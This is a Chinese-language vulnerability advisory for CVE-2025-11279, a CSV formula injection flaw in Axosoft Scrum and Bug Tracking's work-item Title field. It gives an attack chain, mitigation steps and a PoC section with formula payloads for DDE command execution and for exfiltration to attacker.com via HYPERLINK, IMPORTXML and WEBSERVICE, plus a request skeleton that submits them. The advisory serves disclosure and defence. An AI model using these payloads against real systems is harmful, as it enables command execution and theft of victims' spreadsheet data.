IPBUF安全漏洞报告
English
CVE-2025-11279 CVSS 5.5 中危

CVE-2025-11279 Axosoft Scrum与Bug追踪系统CSV注入漏洞

披露日期: 2025-10-05
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-11279
漏洞类型
CSV注入(公式注入)
CVSS评分
5.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Axosoft Scrum and Bug Tracking

相关标签

CSV注入公式注入AxosoftScrumBug Tracking中危漏洞远程攻击数据泄露社会工程学

漏洞概述

CVE-2025-11279是Axosoft Scrum and Bug Tracking(版本22.1.1.11545)中存在的一个CSV注入(CSV Injection)漏洞。该漏洞位于产品的"Add Work Item Page"(添加工作项页面)组件中,涉及对"Title"(标题)参数的处理逻辑缺陷。攻击者可以通过远程方式向该参数注入恶意的CSV公式内容(如Excel公式命令),当该数据被导出为CSV文件并被其他用户使用电子表格软件(如Microsoft Excel、LibreOffice Calc等)打开时,注入的恶意公式将被自动执行,从而可能导致数据泄露、远程代码执行或钓鱼攻击等后果。

该漏洞的CVSS 3.1评分为5.5分,属于中危级别。其攻击向量为网络(AV:N),攻击复杂度低(AC:L),但需要低权限认证(PR:L)和用户交互(UI:R)才能完成攻击。漏洞对机密性、完整性和可用性均产生低级别影响。该漏洞的利用代码已经公开,供应商在收到漏洞披露通知后未做出任何响应,增加了用户面临的安全风险。

技术细节

CSV注入(又称公式注入)是一种针对电子表格应用程序(如Excel)的注入攻击。当应用程序允许用户输入的数据未经适当过滤或转义就被导出到CSV文件时,攻击者可以在字段中注入以等号(=)、加号(+)、减号(-)、at符号(@)等特殊字符开头的公式。当受害者使用电子表格软件打开该CSV文件时,这些公式将被自动解析和执行。

在本漏洞中,Axosoft Scrum and Bug Tracking的"Add Work Item Page"组件中的"Title"字段未对用户输入进行充分的过滤和转义处理。攻击者可以在Title字段中注入类似"=cmd|'/c calc'!A1"或"=HYPERLINK(\"http://attacker.com/?data=\"&A1,\"Click Here\")"的恶意公式。当合法用户将包含这些工作项数据的CSV导出文件下载并用Excel打开时,恶意公式将在受害者的上下文中执行,可能导致以下危害:1)通过DDE(Dynamic Data Exchange)执行任意系统命令;2)窃取受害者的敏感数据(如通过HYPERLINK函数将数据外泄);3)进行钓鱼攻击(通过显示伪造的警告信息);4)下载并执行恶意文件。

利用条件包括:攻击者需要拥有有效的低权限账户(PR:L),需要用户交互(UI:R)来打开导出的CSV文件。由于漏洞利用代码已公开,该漏洞的实际威胁等级不容忽视。

攻击链分析

STEP 1
步骤1:获取账户访问权限
攻击者通过合法注册、购买凭证或利用其他漏洞获取Axosoft系统的低权限用户账户。
STEP 2
步骤2:注入恶意CSV公式
攻击者登录系统后,导航至"Add Work Item Page"(添加工作项页面),在Title字段中输入以特殊字符(如=、+、-、@)开头的恶意CSV公式内容。
STEP 3
步骤3:提交并存储恶意数据
提交工作项后,恶意公式被存储到系统数据库中。由于应用未对输入进行过滤或转义处理,恶意内容被原样保存。
STEP 4
步骤4:诱导受害者导出CSV
攻击者通过社会工程学手段(如发送伪造邮件、通知等)诱导合法管理员或用户导出包含恶意工作项数据的CSV报告文件。
STEP 5
步骤5:触发公式执行
受害者在本地使用Excel或其他电子表格软件打开CSV文件时,恶意公式被自动解析执行,可能导致命令执行、数据泄露或钓鱼攻击。
STEP 6
步骤6:数据窃取或系统入侵
恶意公式执行后,攻击者可以窃取受害者系统中的敏感数据、获取会话凭证或通过DDE执行任意系统命令,进一步控制受害者机器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-11279 - Axosoft Scrum and Bug Tracking CSV Injection PoC # The vulnerability exists in the "Title" field of "Add Work Item Page" # Injecting CSV formula characters at the beginning of the Title parameter # Malicious payloads that can be injected into the Title field: # Payload 1: DDE-based command execution (Windows) payload_1 = '=cmd|\'/c calc\'!A1' # Payload 2: Data exfiltration via HYPERLINK payload_2 = '=HYPERLINK("http://attacker.com/exfil?data="&A1,"Click for details")' # Payload 3: Information disclosure via IMPORTXML payload_3 = '=IMPORTXML("http://attacker.com/malicious.xml","//data")' # Payload 4: Phishing via warning message payload_4 = '=10*10+WARNING("Your session has expired, please re-login")' # Payload 5: Direct external reference payload_5 = '=WEBSERVICE("http://attacker.com/payload")' # Example HTTP request to exploit the vulnerability: import requests target_url = "https://target-axosoft-server/ItemAdd.asp" # (Actual endpoint may vary based on Axosoft version and configuration) headers = { "Content-Type": "application/x-www-form-urlencoded", "Cookie": "ASP.NET_SessionId=<valid_session_cookie>" } data = { "Title": payload_1, # Inject malicious CSV formula as the Title "Description": "Normal description", "Priority": "1", # Other required fields... } # response = requests.post(target_url, headers=headers, data=data) # After the work item is created, export the data as CSV # When victim opens the CSV in Excel, the formula executes automatically

影响范围

Axosoft Scrum and Bug Tracking 22.1.1.11545

防御指南

临时缓解措施
在官方补丁发布之前,建议采取以下临时缓解措施:1)在客户端使用文本编辑器(如Notepad++)而非Excel打开CSV文件;2)在Excel中通过"文件→选项→信任中心→信任中心设置→外部内容"禁用自动链接更新和DDE功能;3)在Axosoft前端通过Web应用防火墙(WAF)规则过滤包含CSV注入特征的输入;4)定期审查系统中存储的工作项数据,清理可疑的注入内容;5)限制可导出CSV数据的用户范围;6)对所有用户进行安全意识培训,警惕来源不明的CSV文件。由于供应商未对漏洞披露做出响应,建议组织评估迁移到其他受支持的产品的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表